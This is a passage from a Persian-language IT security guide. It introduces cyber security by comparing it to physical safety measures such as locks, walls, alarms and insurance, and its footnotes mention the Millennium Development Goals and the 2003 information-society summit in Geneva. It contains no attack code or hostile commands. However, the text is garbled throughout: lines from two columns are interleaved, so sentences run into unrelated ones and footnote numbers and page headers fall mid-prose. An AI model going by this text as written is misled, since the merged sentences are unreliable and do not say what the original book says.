ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻦ ﻳـﺎ ﻛـﻢ ﺷـﺪﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﻭ ﭘﻴﺶ ﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺍﻱ ﮔﺮﺩﺩ .ﻧﻴﻞ ﺑـﻪ ﺍﻫـﺪﺍﻑ
ﺍﺳﺖ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻮﺳﻌﺔ ﻫﺰﺍﺭﻩ ) ٢٢(MDGﺑﻪ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ
ﻧﻔﻮﺫﻫﺎﻱ ﺑﻌﺪﻱ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺑﻮﺩﺟـﺔ ﺁﻧﻬـﺎ ﺑـﺎ
٢٣
ﺩﻧﻴــﺎﻱ ﻭﺍﻗﻌــﻲ ﻗﺎﺑــﻞ ﺗﺤﻤــﻞ ﻧﻴــﺴﺖ ،ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﻋﻀﻮﻳﺖ ﺩﺍﺋﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ.
ﻧﻤﻲﺗﻮﺍﻥ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺭﺍ ﺗﺤﻤﻞ ﻛﺮﺩ .ﻓﻨﻮﻥ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺴﺐ ﻭ ﺗﺄﻣﻴﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺐ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺗﻤـﺎﻣﻲ
ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧﻮﺩﺗـﺎﻥ ﺩﺭ ﻣﻘﺎﺑـﻞ ﭼﻨـﻴﻦ ﺭﻓﺘﺎﺭﻫـﺎﻳﻲ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻛﻤﻚ ﻛﻨﺪ.
ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﻇﻮﺍﻫﺮ ﺧﻮﺏ ﻭ ﺑﺪ ﺍﻧﺴﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓـﻀﺎﻱ
ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﻫﺮ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻣـﻀﺎﻣﻴﻦ
ﻛﺴﺐ ﺩﺍﻧﺴﺘﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﻭﻳــﺮﺍﻳﺶ ﺁﻧﻬــﺎ ﺁﺳــﺎﻥ ﺍﺳــﺖ ،ﻣﻐﺎﻟﻄــﻪ ﻭ ﺗﺤﺮﻳــﻒ
ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﻣﻬﺎﺭﺗﻬﺎﻳﺘﺎﻥ ﺑﻲ ﻧﻴﺎﺯ ﻧﻤﻲ ﻛﻨﺪ .ﺍﻣـﺮﻭﺯﻩ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺜﻞ ﺟﻌﻞ ﻣﺴﺘﻨﺪﺍﺕ ﺍﺩﺍﺭﻱ ﻭ ﺭﺳﻤﻲ ﺁﺳﺎﻥ ﻣﻲﺷـﻮﺩ.
ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺩﻧﻴﺎﻱ ﺷﮕﻔﺖ ﺍﻧﮕﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﻧﺴﺘﻪﻫﺎ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﺁﻧﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻳﻚ ﻣﺤﻴﻂ ﭘﮋﻭﻫﺸﻲ ﻭ ﺗﻌﺎﻭﻧﻲ ﺷـﺮﻭﻉ
ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑـﺎ ﻗﻴﻤـﺖ ﺑـﺴﻴﺎﺭ ﻧـﺎﺯﻝ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻫﺪﻑ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺁﺳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺑـﻮﺩ ،ﺳـﺎﺧﺘﺎﺭ
ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲ ﺗـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺁﻥ ﺑﺎﻋــﺚ ﺗــﺴﻬﻴﻞ ﺣﻤﻠــﻪ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺳــﺮﻗﺖ ﺍﻃﻼﻋــﺎﺕ
ﻛﺎﺭﺁﻣﺪ ﻭ ﻣﺆﺛﺮﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺭﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻣﻲﮔﺮﺩﺩ.
ﺍﻳﻦ ﻫﺪﻑ ﻻﺯﻡ ﺍﺳﺖ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻧﮕﻴﺰﺓ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﭼﻨﻴﻦ ﺭﻓﺘﺎﺭﻱ ﺍﺯ ﺧﻮﺩ ﺑـﺮﻭﺯ
ﻣﻘﺎﺑﻞ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ .ﺑﺎ ﻣﻔﻬﻮﻡ ﻫﻮﺷﻴﺎﺭﻱ ﺩﺭ
ﻣﻲﺩﻫﻨﺪ ﺷﺒﻴﻪ ﺍﻧﮕﻴﺰﻩﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ .ﺍﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺑﻴـﺎﻣﻮﺯﻳﻢ ﻛـﻪ ﭼﮕﻮﻧـﻪ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ :ﻣﺤﻴﻄﻲ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻮﺷﻴﺎﺭﻱ )ﻫﻮﺷﻴﺎﺭﻱ ﺳـﺎﻳﺒﺮ( ﺭﺳـﻴﺪ. ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺷـﺪﻩ ﺩﺭ ﺍﻓـﺮﺍﺩ
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷـﻤﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻣﻬـﻢ ﺗﻬﻴـﻪ ﻭ ﺍﻳﻦ ﺗﻤﺎﻳﻞ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﺛﺎﺑﺖ ﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ
ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺍﺳﺖ.
ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻣﺘﻔﺎﻭﺕ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﻨﻨـﺪ
ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺗﺎ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ،ﺣﺪﺍﻗﻞ ﺷﻮﺩ.
21 Cairncross, F., The Death of Distance: How
ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺣﻴﺎﺗﻲ ﺍﺳﺖ. the Communications Revolution will Change
our Lives, Harvard Business School Press
ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ،ﺍﻣﻨﻴﺖ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔـﻆ ﺑﻘـﺎ؛ (1997).
22 Millennium Development Goals
ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧـﺎﺕ ،ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻣﻮﺿـﻮﻉ ﺍﺻـﻠﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ۲۳
ﺗﺄﻣﻴﻦ ﻏﺬﺍ. ﺍﺟﻼﺱ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺲ ﺧـﻮﺩ ﺩﺭ ﺟﻨـﻮﺍ )ﺩﺳـﺎﻣﺒﺮ
(۲۰۰۳ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎﺯ ﻫﻢ ﺩﺭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳـﻞ (۲۰۰۵
ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﺷﻮﺩ .ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻦ ﻭﺍﻗﻌﻴـﺖ ﺍﺳـﺖ ﻛـﻪ
ﻧﻘﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭ ﺗﻮﺳـﻌﻪ ﺑﺘـﺪﺭﻳﺞ ﺑـﻪ ﺟﺎﻳﮕـﺎﻩ
24 Crackers ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﻧﺰﺩﻳﻜﺘﺮ ﻣﻲﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢
ﺗﻌﻴﻴﻦ ﺳﺮﻧﻮﺷﺖ ﺭﺍ ﺑﺎ ﺑﻴﻤﻪ ﺟﺒﺮﺍﻥ ﻣﻲﻛﻨـﻴﻢ ﺗـﺎ ﻣـﺎ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ
ﺍﺛﺮﺍﺕ ﻣﻨﻔﻲ ﻣﺎﻟﻲ ،ﺣﻮﺍﺩﺙ ﻭ ﺑﻴﻤﺎﺭﻳﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻨﺪ. ﻋﻤﻮﻣﹰﺎ ﺑﺮﺍﻱ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻣﻄﺮﺡ ﻧﺒـﻮﺩ .ﺑـﺎ ﭘﻴـﺸﺮﻓﺖ
ﺗﻤﺪﻥ ،ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺖ ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﺍﺑﻌـﺎﺩ ﻭﺳـﻴﻌﺘﺮﻱ ﻣﺎﻧﻨـﺪ ﺩﺭ
ﺍﻳﻦ ﻣﻘﺪﻣﻪ ﺣﻘﻴﻘﺘﻲ ﺭﺍ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﭘﻴﺶ ﺭﻭﻱ ﻣﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺁﺳﺎﻳﺶ ﻭ ﺯﻧﺪﮔﻲ ﺑﻲﺧﻄـﺮ ﺭﺍ ﺩﺭ ﺑـﺮ
ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻭﺍﻗﻌـﻲ ﻭ ﭼـﻪ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﮔﺮﻓﺖ ﻭ ﺍﻣﺮﻭﺯﻩ ﻣﻔﻬﻮﻡ ﺍﻣﻮﺍﻝ ﺷﺨﺼﻲ ﻧﻴﺰ ﺑـﻪ ﺗﻌﺮﻳـﻒ ﺍﻣﻨﻴـﺖ
ﻏﻴﺮﻣﻤﻜﻦ ﻭ ﻣﺤﺎﻝ ﺍﺳﺖ؛ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﻛــﺎﻓﻲ ﻣﻨﺎﺳــﺐ ﺑﺎﺷــﺪ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﺷــﺮﺍﻳﻂ ﻣﺤﻴﻄــﻲ
ﺩﺳﺖﻳﺎﻓﺘﻨﻲ ﻣﻲﺑﺎﺷﺪ. ﺑﻴﺸﺘﺮ ﺁﻧﭽﻪ ﻛﻪ ﻣﺎ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﻢ ﺑﺎ ﻣﺨـﺎﻃﺮﻩ
ﻫﻤﺮﺍﻩ ﺍﺳﺖ؛ ﻫﺮﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻤﺎﻥ ﻣﺨﺎﻃﺮﺓ ﻛﻤﻲ ﺩﺭ
ﻲ
ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﻘـﻮﻳﺘ ﹺ
ﻼ ﻭﻗﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺷﺨﺼﻲ ﻧﺎﺁﺷﻨﺎ ﺑﻪ ﺳﻔﺮ ﻣﻲﺭﻭﻳـﻢ ﭘﻲ ﺩﺍﺭﺩ .ﻣﺜ ﹰ
ﺍﻓﺰﺍﻳﺶ ﻭ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻴﺰﻳﻜـﻲ
ﻭ ﻳﺎ ﺑﻪ ﺷﻬﺮ ﻳﺎ ﻛﺸﻮﺭﻱ ﻧﺎﺁﺷﻨﺎ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﻳﻢ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﺭﺍ
ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻴﻢ :ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺑﻠﻨﺪ ﻭ
ﻣﺴﺘﺤﻜﻢ ﻭ ﺩﺭﻫﺎﻱ ﻣﺤﻜـﻢ ﻭ ﻧﻔﻮﺫﻧﺎﭘـﺬﻳﺮ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﻗﻔﻠﻬـﺎ ﻭ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺟـﺴﻤﻲﻣـﺎﻥ ﺗﻬﺪﻳـﺪﺍﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﻛﻠﻴﺪﻫﺎﻱ ﺑﻲﺷﻤﺎﺭ .ﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺩﻳﮕﺮ ﻣﺜﻞ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻭﻗﺘﻲ ﺟﺪﻱ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛـﻪ ﻣـﺎ
ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺩﻳﮕـﺮ ﻣﻮﺍﻧـﻊ ﺟﺪﺍﺳـﺎﺯ ﻧﻴـﺰ ﺗﻜﻴـﻪ ﻛﻨـﻴﻢ .ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻜﺎﻧﻲ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﻢ ﻭ ﺑﺎ ﻓـﺮﺩﻱ ﺭﻭﺑـﺮﻭ ﺷـﻮﻳﻢ
ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﻭﻱ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻧﻔﻮﺫ ﻣـﻲﺭﻭﺩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻣﻮﻗﻌﻴﺖ ﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺍﮔﺮ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ
ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻃﺮﺍﻑ ﺧـﻮﺩ ﺗﻮﺟـﻪ ﻛﻨـﻴﻢ ﻣﻮﻓـﻖ ﺧـﻮﺍﻫﻴﻢ ﺷـﺪ
ﻧﻮﺭ ﻛﺎﻓﻲ ﻣﺘﻤﺮﻛﺰ ﻛﻨﻴﻢ .ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﻲﺗﻮﺍﻥ ﺑﺎ
ﻼ ﻫﻤﺮﺍﻩ ﻛـﺴﻲ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﭘﻴﺪﺍ ﻛﻨﻴﻢ ﻳﺎ ﺭﺍﻩ ﭼﺎﺭﻩﺍﻱ ﺑﻴﺎﺑﻴﻢ؛ ﻣﺜ ﹰ
ﺍﻳــﻦ ﻓــﺮﺽ ﻛــﻪ ﺍﻗــﺪﺍﻣﺎﺕ ﻧﻔــﻮﺫﻱ ﺍﻭﻟﻴــﻪ ﻣﻮﻓــﻖ ﺑﺎﺷــﻨﺪ ﺍﺯ
ﺷﻮﻳﻢ ﻛﻪ ﻣﺎ ﺭﺍ ﺑﻪ ﻣﻜﺎﻥ ﺍﻣﻨﻲ ﻫﺪﺍﻳﺖ ﻛﻨـﺪ ،ﻳـﺎ ﻳـﻚ ﺗﺎﻛـﺴﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﻗﻮﻳﺘﺮ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﻣﻬﻤﺘـﺮ ﺑﮕﻴﺮﻳﻢ.
ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻭ ﺟﺰﺍﻳﻲ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﻛﺎﺭﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺭﻭﺍﻧﺸﻨﺎﺧﺘﻲ ﻳﺎ ﻣﺎﻟﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧـﺪ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻴﻢ. ﻭﻟﻲ ﻣﺨﺎﻃﺮﺓ ﺟﺴﻤﻲ ﻧﺪﺍﺭﻧﺪ .ﻭﻗﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻲﻛﻨـﻴﻢ )ﺩﺭ
ﻫﺮﻳﻚ ﺍﺯ ﺍﺷﻜﺎﻝ ﺧﺮﻳﺪ ﺯﻣﻴﻦ ،ﺳﻬﺎﻡ ﻳﺎ ﺣﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺩﺭ ﺗﺠﺎﺭﺕ ﻭ ﻳﺎ ﻛـﺎﺭ ﺩﺭ
ﻻ ﺍﺯ ﭼﻨﺪﻳﻦ ﺭﻭﺵ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ ﻣﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺎﺯﺍﺭ( ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﻢ ﻛﻪ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪ ﻫﺮﭼﻪ ﺯﻭﺩﺗﺮ ﺑﻪ ﻣـﺎ ﺑـﺎﺯﮔﺮﺩﺩ.
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﻧـﺸﺪ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﻢ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺩﻳـﺮ ﻳـﺎ ﺯﻭﺩ
ﺩﻳﮕﺮﻱ ﺧﻼﺀ ﺁﻧﺮﺍ ﭘﺮ ﻛﻨﺪ .ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﻛﻠﻴﺪﻫﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺖ ﻭ
ﺑﺎﺯﺧﻮﺍﻫﻨﺪ ﮔﺸﺖ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺑﻌﻀﻲ ﺍﺯ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺍﻳﻨﮕﻮﻧـﻪ
ﻞ ﺩﺭ ﺍﺯ ﺁﻥ ﭘﺲ ﺣﻔﺎﻅ ﻣﻄﻤﺌﻨﻲ ﺑﻪ ﺷﻤﺎﺭ ﻧﻤﻲﺭﻓﺖ ،ﻣﻲﺗﻮﺍﻥ ﻗﻔ ﹺ
ﻼ ﻭﻗﺘﻲﻧﻴﺴﺘﻨﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﻢ ﺑﻪ ﺯﻳﺎﻥ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﺍﺯ ﻋﻼﺋﻢ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺧﻄـﺮ ﻧﻔـﻮﺫ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ.
ﺑﺎ ﺷﺨﺺ ﺟﺪﻳﺪﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻴﻢ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﻛـﻪ ﺍﻳـﻦ
ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺯﻫﺎ ﻭ ﻋﻮﺍﻣﻞ ﺳﺪﻛﻨﻨﺪﻩ ﺑﻪ ﺍﺭﺯﺵ ﭼﻴﺰﻱ ﻛﻪ ﻣـﻮﺭﺩ
ﺭﺍﺑﻄﺔ ﺟﺪﻳﺪ ﺑﺮﺍﻳﻤﺎﻥ ﺁﻭﺭﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ ﺧﻄـﺮ ﺍﻳـﻦ
